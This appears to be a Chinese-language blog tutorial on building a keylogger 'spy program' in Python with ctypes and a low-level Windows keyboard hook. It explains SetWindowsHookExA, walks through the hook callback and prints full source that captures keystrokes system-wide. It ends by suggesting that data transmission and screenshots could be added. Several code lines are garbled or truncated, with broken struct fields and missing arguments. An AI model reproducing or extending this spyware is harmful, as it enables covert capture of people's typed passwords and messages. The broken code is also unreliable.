使用Python打造一款間諜程式的流程分析
知識點
這次我們使用python來打造一款間諜程式
程式中會用到許多知識點,大致分為四塊
win32API 此處可以在MSDN上檢視
Python基礎重點在cpytes庫的使用,使用方法請點選此處
C語言基礎
Hook
程式的基本原理在於通過註冊Hook,記錄系統事件
那麼什麼是Hook呢
Hook 技術又叫做鉤子函式,系統在呼叫函式之前,鉤子程式就先捕獲該訊息,鉤子函式先得到控制權,這時鉤子函式既可以加工處理(改變)該函式的執行行為,還可以強制結束訊息的傳遞
註冊Hook時我們需要先匯入DLL庫,在Python中我們使用ctypes來匯入,匯入方法如下
user32 = CDLL("user32.dll")
kernel32 = CDLL("kernel32.dll")我們匯入了user32.dll和kernel32.dll
這兩個DLL有什麼用處呢
user32.dll 是Windows使用者介面相關應用程式介面,用於包括Windows處理,基本使用者介面等特性,如建立視窗和傳送訊息
kernel32.dll 控制著系統的記憶體管理、資料的輸入輸出操作和中斷處理
流程部分
知道了我們要使用什麼樣的工具,那麼第一步應該怎麼做呢
1.首先我們需要先註冊Hook到系統上,通過user32.dll中的SetWindowsHookExA函式,我們可以在系統上註冊鉤子
HHOOK SetWindowsHookExA( int idHook,HOOKPROC lpfn,HINSTANCE hmod,DWORD dwThreadId );
通過檢視文件我們看到SetWindowsHookExA函式的引數及引數型別如上所示,詳細文件點選此連結檢視
通過文件我們看到第一個引數idHook中填入鉤子的型別
WH_KEYBOARD_LL的常量值為13代表的意思是監視低階鍵盤輸入事件,我們此處來監聽鍵盤事件
第二個引數lpfn代表指向鉤子過程的指標,要填入鉤子過程(函式),我們可以在此處來新增額外程式碼達到我們想要達成的目的
第三個引數hmod表示為DLL控制代碼,我們可以使用kernel32中的GetModuleHandleW來獲取控制代碼
最後一個引數dwThreadId我們填入0代表與同一桌面上所有的執行緒關聯
程式碼如下
user32.SetWindowsHookExA(13,handleProc,kernel32.GetModuleHandleW(),0)
如何使用Python來編寫我們的鉤子過程呢,通過ctypes文件我們可以得知windows下使用WINFUNCTYPE來建立函式
此時我們發現有WINFUNCTYPE和CFUNCTYPE兩個函式,具體要使用哪一個呢,這兩個的區別為
WINFUNCTYPE 為Windows下獨有的,通過使用使用stdcall呼叫約定的函式
CFUNCTYPE 使用標準C呼叫約定的函式
HOOKPROC = WINFUNCTYPE(c_int,c_int,POINTER(DWORD))
因為我們呼叫的是WH_KEYBOARD_LL,WH_KEYBOARD_LL會使用LowLevelKeyboardProc回撥函式,同時我們也需要在Python定義它
LowLevelKeyboardProc資料結構如下
LRESULT CALLBACK LowLevelKeyboardProc( _In_ int nCode,_In_ WPARAM wParam,_In_ LPARAM lParam );
按照官方文件提示如果nCode小於零,則掛鉤過程必須將訊息傳遞給CallNextHookEx函式,而無需進一步處理,並且應返回CallNextHookEx返回的值
我們轉換為Python程式碼
class KBDLLHOOKSTRUCT(Structure):
_fields_ = [
('vkCode',DWORD),('scanCode',('flags',('time',('dwExtraInfo',DWORD)]
def hookProc(nCode,wParam,lParam):
if nCode < 0:
return user32.CallNextHookEx(hooked,nCode,lParam)
else:
# 此處插入我們的程式碼
pass
return user32.CallNextHookEx(hooked,lParam)
最後在我們退出程式時還需要刪除Hook,不然大量的Hook會使系統執行緩慢,雖然在Windows 7及更高版本上,該鉤子會被靜默刪除而不被呼叫。應用程式無法知道掛鉤是否已刪除。我們還是主動進行刪除
刪除需要使用user32.dll的UnhookWindowsHookEx,引數為Hook控制代碼
user32.UnhookWindowsHookEx(hooked)
下面貼上全部程式碼
import sys
from ctypes import *
from ctypes.wintypes import DWORD,HHOOK,HINSTANCE,MSG,WPARAM,LPARAM
user32 = CDLL("user32.dll")
kernel32 = CDLL("kernel32.dll")
class KBDLLHOOKSTRUCT(Structure):
_fields_ = [
('vkCode',DWORD)]
def uninstallHookProc(hooked):
if hooked is None:
return
user32.UnhookWindowsHookEx(hooked)
hooked = None
def hookProc(nCode,lParam)
else:
if wParam == 256:
if 162 == lParam.contents.value:
print("Ctrl pressed,call Hook uninstall()")
uninstallHookProc(hooked)
sys.exit(-1)
capsLock = user32.GetKeyState(20)
# kb_struct = cast(lParam,POINTER(KBDLLHOOKSTRUCT))
if lParam.contents.value==13:
print("\n")
elif capsLock:
print(chr(lParam.contents.value),end="")
else:
print(chr(lParam.contents.value+32),end="")
return user32.CallNextHookEx(hooked,lParam)
def startKeyLog():
msg = MSG()
user32.GetMessageA(byref(msg),0)
def installHookProc(hooked,pointer):
hooked = user32.SetWindowsHookExA(
13,pointer,0
)
if not hooked:
return False
return True
HOOKPROC = WINFUNCTYPE(c_int,POINTER(DWORD))
pointer = HOOKPROC(hookProc)
hooked = None
if installHookProc(hooked,pointer):
print("Hook installed")
try:
msg = MSG()
user32.GetMessageA(byref(msg),0)
except KeyboardInterrupt as kerror:
uninstallHookProc(hooked)
print("Hook uninstall...")
else:
print("Hook installed error")
貼上我們的效果圖
我們還可以再新增上額外的程式碼比如資料傳輸,截圖等等 ^_^
如何想要了解更多的只是請點選這裡把 => 地址
總結
以上就是使用Python打造一款間諜程式的流程分析的詳細內容,更多關於python間諜程式請關注我們其它相關文章!